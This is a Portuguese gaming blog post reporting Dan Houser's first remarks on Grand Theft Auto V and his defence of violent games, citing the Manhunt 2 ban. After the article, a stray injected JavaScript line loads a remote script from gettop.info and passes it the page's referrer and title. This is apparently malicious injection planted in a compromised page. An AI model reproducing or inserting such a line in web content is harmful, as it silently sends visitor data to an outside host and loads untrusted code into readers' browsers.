Primeiras declarações sobre GTA V

Pela primeira vez Dan Houser, fundador da Rockstar Games e o criador de Grand Theft Auto, falou publicamente sobre Grand Theft Auto V.

Tal como era esperado ele não adiantou muitas coisas sobre o próximo jogo, referindo apenas que primeiro de tudo era necessário escolher qual a cidade na qual o jogo se desenrolará e só depois é que se vai pensar nos personagens e história do jogo. Ele referiu também que irá ajudar a escrever o guião para Grand Theft Auto V e que o mesmo vai contar com cerca de mil páginas.

Como não podia deixar de ser, Houser também falou sobre sobre a polémica que envolve a violência explicita nos videojogos e em referência a Manhunt 2 ele disse o seguinte ao Times:

Quando proíbem um jogo significa que não fizemos o nosso trabalho principal, o de conseguir que os investidores recuperem o seu dinheiro.

Dan Houser

Penso que finalmente ultrapassámos a discussão sobre a violência nos videojogos. O público agora tem mais de 30 anos de idade, por isso a discussão à volta disso torna-se estúpida. Os jogos não são todos para todos os tipos de público, nós nunca dissemos isso. GTA sempre foi um jogo recomendado para maiores de 18 e nós ficámos sempre satisfeitos com isso. No entanto sentimo-nos frustrados quando os videojogos são marginalizados e os filmes têm sempre carta branca.

Manhunt 2 foi censurado precisamente na mesma semana em que estreou no cinema o filme Saw. As justificações tornam-se bastante ridículas quando as pessoas alegam que os jogos de certa forma são mais perigosos que os filmes. Na Rockstar às vezes sentimos que alguns dos nossos jogos são marginalizados e são marcados como párias. Nós só queremos contar uma história com personagens complexas.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

CommentLuv badge